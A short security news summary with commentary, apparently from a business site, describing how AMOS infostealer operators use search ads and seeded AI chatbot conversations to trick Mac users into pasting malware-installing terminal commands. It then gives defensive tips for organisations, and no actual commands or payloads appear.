Online Criminals Are Using Trusted AI And Tech Assistance To Install Malware

Security researchers report that operators of the atomic MacOS stealer (amos) are abusing paid Google search ads and pre-seeded conversations in popular AI chatbots to deliver MacOS malware.

Users searching for help freeing disk space on Mac computers are shown sponsored links leading to chatbot conversations that provide fake troubleshooting steps.

The instructions tell users to open the MacOS terminal and paste in a command that silently downloads and is run by an amos infostealer, which then seeks extensive permissions but can exfiltrate passwords, browser data, cryptocurrency information, and other sensitive resources while avoiding some built-in security warnings.

The scheme mimics earlier "clickfix" social engineering attacks but now adds trusted AI tools and search platforms to create realistic appearances for the malicious advice.

Source: https://www.kaspersky.com/blog/fake-ai-agents-infostealers/55412/

Commentary

In the above source, attackers make the trusted search platforms and mainstream AI assistants look convincing enough that Mac users will self-install credential stealing malware.

For organizations that utilize Macs, or your employees who use Macs for business purposes, this extends the scope of malicious downloads to any workflow when your employees interact with an external site or work online via ai tools or on a computer from which they receive technical support.

Here are some loss prevention and best practice tips for organizations to follow:

• Implement macos endpoint protection with behavioral detection tuned for infostealers, unauthorized keychain access, abnormal browser data exports and unexpected network exfiltration to command-and-control servers.

• Concentrate on browsers and search settings; limiting or tracking access to sponsored results and potentially harmful categories such as "system cleaners," "free disk utilities," and unauthorized AI apps.

• Introduce security awareness micro training that includes fake troubleshooting pages, clickfix style prompts, and AI generated responses that instruct users to disable protections or run obscure shell commands.

• Limit the extent of AI tool use that employees can get with corporate devices, and define only authorized internal documentation or service channels for system level fixes.

The final takeaway is that you want to make sure that you use both proper technical controls, and training on AI-related social engineering to not have your employees be unintentional installers of infostealer malware on organization/personal devices.



Finally, your opinion is important to us. Please complete the opinion survey:

What's New

Online Criminals Are Using Trusted AI And Tech Assistance To Install Malware

A recent effort leverages poisoned chatbot AI and harmful search ads. We speak to what organizations should be doing to address this emerging risk.

Animated Deception: How Data Thieves Use Slick Visuals To Lure Targets

Cybercriminals are using polished animated graphics, fake legal notices, and spoofed software updates to deliver malware that often evades traditional detection tools. How should organizations respond?

Spoofed Sites And Password Vault Servers: What IT Teams Must Monitor Every Day

A single employee action led to ransomware affecting dozens of state agencies and services. We comment on ways to limit damage.

Latest Numbers

  • Unemployment Rate
    4.3% in Jan 2026
  • Payroll Employment
    +130,000(p) in Jan 2026
  • Average Hourly Earnings
    +$0.15(p) in Jan 2026
  • Employment Cost Index (ECI)
    +0.7% in 4th Qtr of 2025
  • Productivity
    +4.9% in 3rd Qtr of 2025

Source: Department of Labor